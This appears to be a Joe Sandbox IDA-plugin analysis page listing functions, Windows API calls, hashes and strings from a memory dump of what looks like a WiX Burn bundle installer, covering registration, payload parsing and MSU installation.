Opcode ID: 4f8f95bc5e7c876d0a1a0b2598f8063104ee7b1299e502c05a036ee161ca1c45
Instruction ID: f8c8e3d0a6edc9d6c4b95aa1ec51cf5b55a81785573121088842ef878c1109d9
Opcode Fuzzy Hash: 4f8f95bc5e7c876d0a1a0b2598f8063104ee7b1299e502c05a036ee161ca1c45
Instruction Fuzzy Hash: 72024DB1E002199FDF14CFA9C8806ADB7F1EF89324F258169D919E7780D770AD42DB91

Function 00103A5F Relevance: 3.1, APIs: 2, Instructions: 58memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00103BF1: RegCloseKey.ADVAPI32(00000000,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,00020019,00000000,?,?,?,?,?,00103A8E,?), ref: 00103C62

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00103AB2
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00103AC3

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: AllocateCheckCloseInitializeMembershipToken
String ID:
API String ID: 2114926846-0
Opcode ID: 56cd315208a62ca21492a184198d1074bfe7e71b97622c81ec392ef774b956a8
Instruction ID: 48401aa468166209a684d0a89e23ac1aba78f9d5fabb1a6887e28e5a5b24938d
Opcode Fuzzy Hash: 56cd315208a62ca21492a184198d1074bfe7e71b97622c81ec392ef774b956a8
Instruction Fuzzy Hash: EC112771A0020EEFDB10DFA4CC85AAFB7BCEF08300F50482AA591E7181E7B09A408B61

Function 00104440 Relevance: 3.0, APIs: 2, Instructions: 44fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(000E923A,?,00000100,00000000,00000000), ref: 0010447B
FindClose.KERNEL32(00000000), ref: 00104487

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 830bdcc303c379d2ca388ba6dd679c9f3d5c173f2bccd45cf0bf2ddd7f66395e
Instruction ID: 78264e055d54395241fcd67e013e111a0ed0dfae9bb5a0e82614d547fcff22ff
Opcode Fuzzy Hash: 830bdcc303c379d2ca388ba6dd679c9f3d5c173f2bccd45cf0bf2ddd7f66395e
Instruction Fuzzy Hash: B501F971A0020C6BCB10EF65EDC9EABB3ACEFC5315F400065F954D3281D7745D998754

Function 000F2C18 Relevance: 2.7, Strings: 2, Instructions: 214COMMONLIBRARYCODE

Download Yara Rule

Strings

comres.dll, xrefs: 000F2DBF, 000F2DD8, 000F2E00, 000F2E2B
0, xrefs: 000F2D88

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID:
String ID: 0$comres.dll
API String ID: 0-3030269839
Opcode ID: f7a880ec5967ec64a90054ca813bf1243ddeae79b496adee3d9f08ad155e7dd2
Instruction ID: e92563600498ece15e43ebdd10fe65fe0b1f6df3667821131b7f2d383e7ee819
Opcode Fuzzy Hash: f7a880ec5967ec64a90054ca813bf1243ddeae79b496adee3d9f08ad155e7dd2
Instruction Fuzzy Hash: C851AB70200B4C57DBB8996884967FF2BC59B16340F280919EB47CBE83C619EE41B3D6

Function 000FEE7C Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,000FEE77,?,?,00000008,?,?,000FEB17,00000000), ref: 000FF0A9

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 3133a242977f40d04d1dfddd45a229b14059684afa7d6f59d81d9e414c6fa510
Instruction ID: 82d99664f4de7fc2b7b9f229dd09a8c7a0e76b31182a24b29b13f01a8ba6ba65
Opcode Fuzzy Hash: 3133a242977f40d04d1dfddd45a229b14059684afa7d6f59d81d9e414c6fa510
Instruction Fuzzy Hash: EEB18E31210609DFD724CF28C486B747BE0FF45364F298668EA99CF6A2C735E981DB40

Function 000EEC07 Relevance: 1.6, APIs: 1, Instructions: 133COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 000EEC20

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: e26612621ef9da71bf8b0795c31811d5b71fc9ffe96dcbfd868dad60e21daf18
Instruction ID: 7db625a9aaa51ce9e6d0a39290e6cb7556b73317db84dca2aac12a20beebbf66
Opcode Fuzzy Hash: e26612621ef9da71bf8b0795c31811d5b71fc9ffe96dcbfd868dad60e21daf18
Instruction Fuzzy Hash: 09519C719042889FDB68CF5AD8856AABBF4FB48300F25806AD405EB260D3B1AD52CF51

Function 000EE9DC Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0002E9E8,000EE131), ref: 000EE9E1

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 250155ede54ab713785be3ade87e06f91c1b6c10f057a018a946663f2a24810a
Instruction ID: 1b7490e1c08c07eb5a20bebb10b7ecd82a5b3738a54bd507e9497471f46aad6a
Opcode Fuzzy Hash: 250155ede54ab713785be3ade87e06f91c1b6c10f057a018a946663f2a24810a
Instruction Fuzzy Hash:

Function 000EFB89 Relevance: .5, Instructions: 481COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00b8abe288f7446931887f4e1a83c8729cc127053a8831268ccac8fe7a1eed14
Instruction ID: f4e5fd9728443db478eeffd35c10130c1bbbe52e6fe79e3fbf863117caa6bfad
Opcode Fuzzy Hash: 00b8abe288f7446931887f4e1a83c8729cc127053a8831268ccac8fe7a1eed14
Instruction Fuzzy Hash: B20207321081E34EDBAD4A3A847007B7BE16B833B071E47ADD8B6DB5D6DE10E564E660

Function 000F0B6F Relevance: .4, Instructions: 352COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 713254dbb735968c7063ac25a152bc56bcdf297f8f834348282298adb5de4d15
Instruction ID: a6a0c3c611ad410e5c5f2986acd8b36d27933e8523e4e087553ea03048a2b627
Opcode Fuzzy Hash: 713254dbb735968c7063ac25a152bc56bcdf297f8f834348282298adb5de4d15
Instruction Fuzzy Hash: 34C170332091A70AEFAD4339843407EBBE15B923B131E579DD5B2CB9D6EE209535F620

Function 000F07AA Relevance: .3, Instructions: 347COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3c7a540a95456d95b2f03679edd2d49eac6f1621006280bdad19664e1d0b21d
Instruction ID: bd7f0c54185e8b8b91d78644d125b975ca6af420cc479e99e0c789ff168721b9
Opcode Fuzzy Hash: f3c7a540a95456d95b2f03679edd2d49eac6f1621006280bdad19664e1d0b21d
Instruction Fuzzy Hash: BFC1B1332091A64AEFAD4239843407EBBE15F823B131E579DD5F2CB9C7EE209525F620

Function 000F03D5 Relevance: .3, Instructions: 331COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43c190a499e79552c1a64f39d84a7142e521bf6eb77b491d3645054bb47bb5be
Instruction ID: 0e1817a5c4154ac703e5a485a4cc92ee2c273c23a94c4f7e070e7f726520af00
Opcode Fuzzy Hash: 43c190a499e79552c1a64f39d84a7142e521bf6eb77b491d3645054bb47bb5be
Instruction Fuzzy Hash: 5BC1A5722051A64BEFAD4239847407FBBE15B927B131E079DD5B2CB8D7EE209534FA20

Function 000F001D Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3d2de95a5a3d7d395022a3d348c00081b72a5afa3478eed40d51441493dea68
Instruction ID: f7d0829b32ca34a27c99eda794fde78185b452dda2e6a422c3b389d96534d5c1
Opcode Fuzzy Hash: c3d2de95a5a3d7d395022a3d348c00081b72a5afa3478eed40d51441493dea68
Instruction Fuzzy Hash: 29B1A4332051A64BEFAD4339843407EFBE15B923B171A179DD5B2CB9C7EE209625F620

Function 000F2E47 Relevance: .2, Instructions: 237COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99d360e1a6b570c1219629a3f3730c4f15a915651b283f57eefa1fcdaf473575
Instruction ID: b520cef9d8fd8e3a2042876fa067b24d937c1f1ef5aedd9b08c58d6e4400f54c
Opcode Fuzzy Hash: 99d360e1a6b570c1219629a3f3730c4f15a915651b283f57eefa1fcdaf473575
Instruction Fuzzy Hash: 1261897121070D56DB789A288865BFE73E4EF41710F60083AFB42DFE82D615DE89F615

Function 000CFF99 Relevance: 84.5, APIs: 1, Strings: 47, Instructions: 484registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000101,?,?,00020006,00000000), ref: 000D0592

Strings

NoModify, xrefs: 000D038B, 000D039E
QuietUninstallString, xrefs: 000D044D, 000D0463
BundlePatchCode, xrefs: 000D00B1, 000D00B9
BundleTag, xrefs: 000D017B, 000D0180
/modify, xrefs: 000D0474
3.11.1.2318, xrefs: 000D0193
URLInfoAbout, xrefs: 000D02A6, 000D02B9
URLUpdateInfo, xrefs: 000D02CC, 000D02DF
BundleProviderKey, xrefs: 000D015A, 000D015F
BundleUpgradeCode, xrefs: 000D0057, 000D005F
BundleVersion, xrefs: 000D00CF, 000D00F5
DisplayVersion, xrefs: 000D0201, 000D0214
HelpTelephone, xrefs: 000D0280, 000D0293
%s,0, xrefs: 000D01C0
%hu.%hu.%hu.%hu, xrefs: 000D00F0
BundleAddonCode, xrefs: 000D0075, 000D007D
EstimatedSize, xrefs: 000D051C, 000D0521, 000D0530
Failed to create registration key., xrefs: 000D001C
Failed to register the bundle dependency key., xrefs: 000D0553
ParentDisplayName, xrefs: 000D02F2, 000D0305
Publisher, xrefs: 000D0234, 000D0247
NoRemove, xrefs: 000D0403, 000D0416
SystemComponent, xrefs: 000D0428, 000D043B
Failed to cache bundle from path: %ls, xrefs: 000CFFEF
Failed to write %ls value., xrefs: 000D0531
Failed to update name and publisher., xrefs: 000D01EE
%hs, xrefs: 000D0198
Contact, xrefs: 000D0362, 000D0375
Failed to write update registration., xrefs: 000D04E5
BundleCachePath, xrefs: 000D003C, 000D0041
/uninstall, xrefs: 000D047B, 000D0480
"%ls" %ls, xrefs: 000D0484
VersionMinor, xrefs: 000D0138, 000D013E
"%ls" /uninstall /quiet, xrefs: 000D0448
Failed to write software tags., xrefs: 000D04C5
EngineVersion, xrefs: 000D019D, 000D01A2
DisplayIcon, xrefs: 000D01BB, 000D01C5
ModifyPath, xrefs: 000D03B5, 000D03CB
ParentKeyName, xrefs: 000D0312, 000D0325
BundleDetectCode, xrefs: 000D0093, 000D009B
Comments, xrefs: 000D033A, 000D034D
VersionMajor, xrefs: 000D010F, 000D0115
Failed to update resume mode., xrefs: 000D056D
UninstallString, xrefs: 000D0489, 000D049F
"%ls" /modify, xrefs: 000D03B0
HelpLink, xrefs: 000D025A, 000D026D
NoElevateOnModify, xrefs: 000D03D7, 000D03EA

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: Close
String ID: /uninstall$"%ls" %ls$"%ls" /modify$"%ls" /uninstall /quiet$%hs$%hu.%hu.%hu.%hu$%s,0$/modify$3.11.1.2318$BundleAddonCode$BundleCachePath$BundleDetectCode$BundlePatchCode$BundleProviderKey$BundleTag$BundleUpgradeCode$BundleVersion$Comments$Contact$DisplayIcon$DisplayVersion$EngineVersion$EstimatedSize$Failed to cache bundle from path: %ls$Failed to create registration key.$Failed to register the bundle dependency key.$Failed to update name and publisher.$Failed to update resume mode.$Failed to write %ls value.$Failed to write software tags.$Failed to write update registration.$HelpLink$HelpTelephone$ModifyPath$NoElevateOnModify$NoModify$NoRemove$ParentDisplayName$ParentKeyName$Publisher$QuietUninstallString$SystemComponent$URLInfoAbout$URLUpdateInfo$UninstallString$VersionMajor$VersionMinor
API String ID: 3535843008-2755343042
Opcode ID: 7f70c2d23a06663b233f31d7bc53b67340a175e0ce3878291fc07c026383ada1
Instruction ID: f9a30d4f4ba2b4a21afca83cd6e59810d4f4d82c60ba87bba43201db839f2535
Opcode Fuzzy Hash: 7f70c2d23a06663b233f31d7bc53b67340a175e0ce3878291fc07c026383ada1
Instruction Fuzzy Hash: 3AF1D771E41B26BBCB275660DD02FEEB665AF14750F040162FD04B6391D7B2ED90EAE0

Function 000CCDBD Relevance: 73.9, APIs: 3, Strings: 39, Instructions: 366COMMON

Download Yara Rule

APIs

Part of subcall function 000C394F: GetProcessHeap.KERNEL32(?,000001C7,?,000C2274,000001C7,00000001,80004005,8007139F,?,?,00100267,8007139F,?,00000000,00000000,8007139F), ref: 000C3960
Part of subcall function 000C394F: RtlAllocateHeap.NTDLL(00000000,?,000C2274,000001C7,00000001,80004005,8007139F,?,?,00100267,8007139F,?,00000000,00000000,8007139F), ref: 000C3967

CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,download,000000FF,00000000,Packaging,00000000,00000000,FilePath,000C545D,00000000,0010CA9C,000C5445,00000000), ref: 000CCEF3

Strings

Catalog, xrefs: 000CD0EC
Failed to get @Container., xrefs: 000CD18D
Failed to get payload node count., xrefs: 000CCE10
SourcePath, xrefs: 000CCFB0
FileSize, xrefs: 000CD002
Failed to get @FileSize., xrefs: 000CD1AB
Container, xrefs: 000CCF4B
Failed to parse @FileSize., xrefs: 000CD1A1
CertificateRootPublicKeyIdentifier, xrefs: 000CD03D
Failed to find catalog., xrefs: 000CD1CE
Failed to get @Hash., xrefs: 000CD1E3
Invalid value for @Packaging: %ls, xrefs: 000CD200
Failed to get @Packaging., xrefs: 000CD213
Hash, xrefs: 000CD0B7
download, xrefs: 000CCEE5
Failed to get @CertificateRootPublicKeyIdentifier., xrefs: 000CD1B9
CertificateRootThumbprint, xrefs: 000CD07A
Failed to get next node., xrefs: 000CD228
LayoutOnly, xrefs: 000CCF8D
Failed to to find container: %ls, xrefs: 000CD186
Failed to select payload nodes., xrefs: 000CCDEB
DownloadUrl, xrefs: 000CCFD9
Failed to get @FilePath., xrefs: 000CD21A
Failed to get @Id., xrefs: 000CD221
external, xrefs: 000CCF21
Failed to get @CertificateRootThumbprint., xrefs: 000CD1C7
Failed to get @LayoutOnly., xrefs: 000CD197
Payload, xrefs: 000CCDD8
payload.cpp, xrefs: 000CCE3F
Failed to get @SourcePath., xrefs: 000CD1F1
Failed to get @DownloadUrl., xrefs: 000CD1EA
Failed to allocate memory for payload structs., xrefs: 000CCE49
Failed to hex decode @CertificateRootThumbprint., xrefs: 000CD1C0
Failed to hex decode the Payload/@Hash., xrefs: 000CD1DC
Failed to hex decode @CertificateRootPublicKeyIdentifier., xrefs: 000CD1B2
Failed to get @Catalog., xrefs: 000CD1D5
FilePath, xrefs: 000CCEAB
Packaging, xrefs: 000CCEC6
embedded, xrefs: 000CCF05

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: Heap$AllocateCompareProcessString
String ID: Catalog$CertificateRootPublicKeyIdentifier$CertificateRootThumbprint$Container$DownloadUrl$Failed to allocate memory for payload structs.$Failed to find catalog.$Failed to get @Catalog.$Failed to get @CertificateRootPublicKeyIdentifier.$Failed to get @CertificateRootThumbprint.$Failed to get @Container.$Failed to get @DownloadUrl.$Failed to get @FilePath.$Failed to get @FileSize.$Failed to get @Hash.$Failed to get @Id.$Failed to get @LayoutOnly.$Failed to get @Packaging.$Failed to get @SourcePath.$Failed to get next node.$Failed to get payload node count.$Failed to hex decode @CertificateRootPublicKeyIdentifier.$Failed to hex decode @CertificateRootThumbprint.$Failed to hex decode the Payload/@Hash.$Failed to parse @FileSize.$Failed to select payload nodes.$Failed to to find container: %ls$FilePath$FileSize$Hash$Invalid value for @Packaging: %ls$LayoutOnly$Packaging$Payload$SourcePath$download$embedded$external$payload.cpp
API String ID: 1171520630-3127305756
Opcode ID: d64076db4f5d4a9079f9c47742ebcef8d6c13a926e78c061c9698b19cd0a21d9
Instruction ID: 537fae00a01732dd1d88c70230c9d33d94112c7956ff763f7eb727896fcb4525
Opcode Fuzzy Hash: d64076db4f5d4a9079f9c47742ebcef8d6c13a926e78c061c9698b19cd0a21d9
Instruction Fuzzy Hash: 16C1B071944229FBDB21DB94CC42FAEB6A4AB04B20F24427EFD51B75D0D7B1EE029690

Function 000C8476 Relevance: 59.8, APIs: 5, Strings: 29, Instructions: 331COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(000C5445,?,00000000,80070490,?,?,?,?,?,?,?,?,000EC1BF,?,000C5445,?), ref: 000C84A7
LeaveCriticalSection.KERNEL32(000C5445,?,?,?,?,?,?,?,?,000EC1BF,?,000C5445,?,000C5445,000C5445,Chain), ref: 000C8804

Strings

Variable, xrefs: 000C84B1
Failed to get @Value., xrefs: 000C8796
Initializing string variable '%ls' to value '%ls', xrefs: 000C861A
Failed to insert variable '%ls'., xrefs: 000C86C6
Failed to get variable node count., xrefs: 000C84E1
numeric, xrefs: 000C85BC
version, xrefs: 000C862C
Initializing numeric variable '%ls' to value '%ls', xrefs: 000C85E2
Failed to get next node., xrefs: 000C87F6
variable.cpp, xrefs: 000C87B9
string, xrefs: 000C85F7
Failed to change variant type., xrefs: 000C87DA
Attempt to set built-in variable value: %ls, xrefs: 000C87C8
Value, xrefs: 000C8565
Failed to get @Type., xrefs: 000C8788
Failed to get @Persisted., xrefs: 000C87E1
Failed to get @Id., xrefs: 000C87EF
Failed to set value of variable: %ls, xrefs: 000C87A7
Initializing hidden variable '%ls', xrefs: 000C8671
Failed to set variant value., xrefs: 000C878F
Hidden, xrefs: 000C852F
Type, xrefs: 000C85A3
Persisted, xrefs: 000C854A
Failed to get @Hidden., xrefs: 000C87E8
Failed to set variant encryption, xrefs: 000C879D
Failed to select variable nodes., xrefs: 000C84C4
Invalid value for @Type: %ls, xrefs: 000C8778
Failed to find variable value '%ls'., xrefs: 000C87D2
Initializing version variable '%ls' to value '%ls', xrefs: 000C8653

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: Attempt to set built-in variable value: %ls$Failed to change variant type.$Failed to find variable value '%ls'.$Failed to get @Hidden.$Failed to get @Id.$Failed to get @Persisted.$Failed to get @Type.$Failed to get @Value.$Failed to get next node.$Failed to get variable node count.$Failed to insert variable '%ls'.$Failed to select variable nodes.$Failed to set value of variable: %ls$Failed to set variant encryption$Failed to set variant value.$Hidden$Initializing hidden variable '%ls'$Initializing numeric variable '%ls' to value '%ls'$Initializing string variable '%ls' to value '%ls'$Initializing version variable '%ls' to value '%ls'$Invalid value for @Type: %ls$Persisted$Type$Value$Variable$numeric$string$variable.cpp$version
API String ID: 3168844106-1614826165
Opcode ID: 13afa920f25a9336e582a6325a8d66d88a818f5cbca250e97c20a2859c2d3956
Instruction ID: 13aeea3152f1772b51a576b5231ebe55c0e3c4bde4d09f258db38b95c688e825
Opcode Fuzzy Hash: 13afa920f25a9336e582a6325a8d66d88a818f5cbca250e97c20a2859c2d3956
Instruction Fuzzy Hash: 1FB1BF32D04229FBCB219B94CC45FAEBBB4AF44710F208359F950B62D1EBB19A40DB94

Function 000E6CCC Relevance: 58.1, APIs: 7, Strings: 26, Instructions: 379COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,000DBDDC,00000007,?,?,?), ref: 000E6D20

Part of subcall function 00100ACC: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,?,000C5EB2,00000000), ref: 00100AE0
Part of subcall function 00100ACC: GetProcAddress.KERNEL32(00000000), ref: 00100AE7
Part of subcall function 00100ACC: GetLastError.KERNEL32(?,?,?,000C5EB2,00000000), ref: 00100AFE

CloseHandle.KERNEL32(00000000,?,000001F4,?,?,?,?,?,?,?,?,?,?,wusa.exe,?,00000025), ref: 000E710F
CloseHandle.KERNEL32(00000000,?,000001F4,?,?,?,?,?,?,?,?,?,?,wusa.exe,?,00000025), ref: 000E7123

Strings

/log:, xrefs: 000E6EA2
Failed to CreateProcess on path: %ls, xrefs: 000E6F9A
Failed to determine WOW64 status., xrefs: 000E6D32
Failed to get cached path for package: %ls, xrefs: 000E6DFC
Failed to format MSU install command., xrefs: 000E6E5C
WixBundleExecutePackageCacheFolder, xrefs: 000E6E0B, 000E713B
Failed to format MSU uninstall command., xrefs: 000E6E89
